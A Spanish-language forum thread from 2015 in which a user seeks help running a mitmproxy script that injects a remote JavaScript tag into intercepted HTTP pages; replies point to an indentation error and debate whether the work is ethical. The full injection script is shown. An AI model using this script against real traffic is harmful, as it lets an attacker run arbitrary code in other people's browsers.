Título: inyectar código MITM a HTTP AYUDA Publicado por: p4tria en 24 Octubre 2015, 12:49 pm Buenas,
estoy tratando de hacer una POC que me he encontrado, y no soy capaz de inyectar el código que quiero a ver si me podéis echar un cable. Estoy usando KALI 2 -------- mitmproxy y un script que me he encontrado por ahí para inyectar código JS. # Usage: mitmdump -s "js_injector.py src" # (this script works best with --anticache) from bs4 import BeautifulSoup from libmproxy.protocol.http import decoded # On start of proxy server ask for src as an argument def start(context, argv): if len(argv) != 2: raise ValueError('Usage: -s "js_injector.py src"') context.src_url = argv[1] def response(context, flow): if flow.request.host in context.src_url: return # Make sure JS isn't injected to itself with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content) if html.body: script = html.new_tag( "script", src=context.src_url, type='application/javascript') html.body.insert(0, script) flow.response.content = str(html) context.log("Script injected.") Hago la redirección de tráfico HTTP y HTTPS al 8080 de mitmproxy; y el problema viene cuando trato de hacer la inyección llamando al script de java que subo a mi python -m SimpleHTTPServer 80 (http://i.imgur.com/ValRmEV.png?1) alguna idea de este error? Título: Re: inyectar código MITM a HTTP AYUDA Publicado por: engel lex en 24 Octubre 2015, 16:17 pm es un problema de sangría... python es sensible con los espacios a la izquierda, distningue espacios de tabulaciones y la cantidad de los mismos
Título: Re: inyectar código MITM a HTTP AYUDA Publicado por: k0pkill3r en 24 Octubre 2015, 20:10 pm el foro no apoya a ilegales......o no éticos
paso de buscar citas...... Título: Re: inyectar código MITM a HTTP AYUDA Publicado por: p4tria en 28 Octubre 2015, 21:11 pm el foro no apoya a ilegales......o no éticos paso de buscar citas...... como no me conoces de nada entiendo que tienes razones suficientes (por mi nick o no sé por qué) para decirme que realizo acciones ilegales/no éticos no sé qué tiene de ilegal realizar POC's en los equipos de mi propia empresa, para poner tonterías mejor no escribas; o si lo haces no prejuzgues es un problema de sangría... python es sensible con los espacios a la izquierda, distningue espacios de tabulaciones y la cantidad de los mismos muchas gracias ya está solucionado ;-) |